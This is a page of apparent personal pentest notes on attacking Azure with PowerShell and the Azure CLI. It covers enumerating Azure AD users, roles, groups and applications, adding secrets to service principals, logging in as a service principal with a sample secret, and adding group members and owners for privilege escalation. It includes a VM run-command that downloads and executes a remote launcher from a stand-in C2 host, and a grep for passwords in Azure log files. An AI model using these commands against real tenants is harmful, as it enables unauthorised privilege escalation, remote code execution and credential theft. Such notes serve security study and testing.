> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/cloud-1/azure/tools/azurecli-powershell.md).

# AzureCli - PowerShell

{% embed url="<https://learn.microsoft.com/en-us/cli/azure/reference-docs-index>" %}

### Connect:&#x20;

```powershell
connect-azuread
```

### Recon:

Get Ad User:

```
Get-AzureAdUser 
Get-AzureAdUser | ?{$_.DisplayName -eq 'Administrator'}
```

Get AD Directory Role:&#x20;

```
Get-AzureADDirectoryRole 
Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId,RoleTemplateId
```

Get AD Directory Role Member (based off above ObjectId):

```
Get-AzureADDirectoryRoleMember 
Get-AzureADDirectoryRoleMember -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"
```

Get AD Group:&#x20;

```
Get-AzureADGroup
Get-AzureADGroup -ObjectId "ObjectID"
```

Get AD Group member:&#x20;

```
Get-AzureADGroupMember -ObjectId d2b8110d-900f-4a37-92f0-b9c541ee4440
```

Get AD Applications:&#x20;

```
Get-AzureADApplication
Get-AzureADApplication -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"
```

Get AD Application Owner:

```
Get-AzureADApplicationOwner -ObjectId "74897263-fd31-48b8-8370-9fb8a847e9ef"
```

## PrivEsc:

### Applications & Service Principle exploitation

Add Application Secret:&#x20;

```powershell
# best to use PowerZure here 
Add-AzureADSPSecret -ApplicationName APPLICATION -Verbose
```

Authenticate as Service principle:

```powershell
$ApplicationId = "2097243e-269f-47-8d-f9c62ecc8b5c"
$SecurePassword = "Z1Y~TjWzaZw"
$SecurePassword = ConvertTo-SecureString -String $SecurePassword -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $ApplicationId, $SecurePassword
Connect-AzAccount -Credential $Credential -Tenant  b20fc61c-960d-4f40-bbbe-17ac412fe0c0  -ServicePrincipal
```

#### AZAddMembers

add target to group:&#x20;

```powershell
Add-AzureADGroupMember -ObjectId GROUP-ID -RefObjectId USER-ID
```

#### AzureADGroupOwner

```powershell
Add-AzureADGroupOwner -ObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -RefObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0
```

###

### Virtual Machine:&#x20;

List VMs:

```
(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}
```

Run command:

<pre><code>az vm run-command invoke --command-id RunPowerShellScript --name -g --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"
<strong>az vm run-command invoke
</strong>az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
</code></pre>

#### Privesc:

```
(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}
```

## Azure shell:&#x20;

#### history enumeration:

```
grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
```
